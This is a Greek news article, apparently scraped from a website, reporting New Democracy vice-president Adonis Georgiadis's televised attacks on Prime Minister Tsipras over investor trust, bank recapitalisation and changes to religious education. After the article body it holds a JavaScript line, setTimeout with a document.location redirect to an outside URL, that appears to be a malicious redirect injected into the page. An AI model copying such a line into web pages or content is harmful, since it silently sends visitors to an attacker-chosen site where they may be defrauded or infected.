Άδωνις: Οι επενδυτές ακούν Τσίπρα και… αλλάζουν πεζοδρόμιο (BINTEO)

0
10

«Με τον Τσίπρα επένδυση από το εξωτερικό δεν γίνεται», είπε ο Αντιπρόεδρος της Νέας Δημοκρατίας Άδωνις Γεωργιάδης, μιλώντας στον τηλεοπτικό σταθμό ΣΚΑΪ.
«Οι επενδυτές ακούνε Τσίπρα κι αλλάζουν πεζοδρόμιο», τόνισε χαρακτηριστικά για να προσθέσει ότι «μεγαλύτερος ψεύτης από τον Τσίπρα δεν έχει γεννηθεί, και πολύ επιεικής είμαι», εκτιμώντας ότι ο κ. Τσίπρας πρέπει να φύγει από την πρωθυπουργία κι ότι έχει χάσει πλήρως την εμπιστοσύνη των επενδυτών, αφού υποστήριξε ότι τους εξαπάτησε για να συμμετάσχουν στην ανακεφαλαιοποίηση των τραπεζών με την υπόσχεση για γρήγορη ολοκλήρωση της πρώτης αξιολόγησης.

Όσον αφορά στην πρόσφατη συζήτηση στη Βουλή για την Παιδεία, ο κ. Γεωργιάδης απέρριψε συνολικά τις αλλαγές που προτείνει η κυβέρνηση για τη διδασκαλία των Θρησκευτικών, λέγοντας ότι ο υπουργός Παιδείας Νίκος Φίλης έχει «προσωπικά συμπλέγματα» με την Εκκλησία και τόνισε ότι ο εκάστοτε υπουργός Παιδείας «δεν μπορεί να μισεί την Εκκλησία», καθώς το Σύνταγμα προστατεύει τη θέση της Ορθοδοξίας στην εκπαίδευση.

Από τα πυρά του κ. Γεωργιάδη για το θέμα της Παιδείαςδενν ξέφυγε και ο πρωθυπουργός, τον οποίο ο αντιπρόεδρος της ΝΔ κατηγόρησε ότι προσπάθησε να χρησιμοποιήσει την Παιδεία ώστε να διχάσει τους Έλληνες αλλά και ότι συμπεριφέρεται με υποκρισία, καθώς ενώ ο ίδιος στέλνει τα παιδιά του σε ιδιωτικό σχολείο κατηγορεί τη ΝΔ για την ιδιωτική εκπαίδευση.

setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here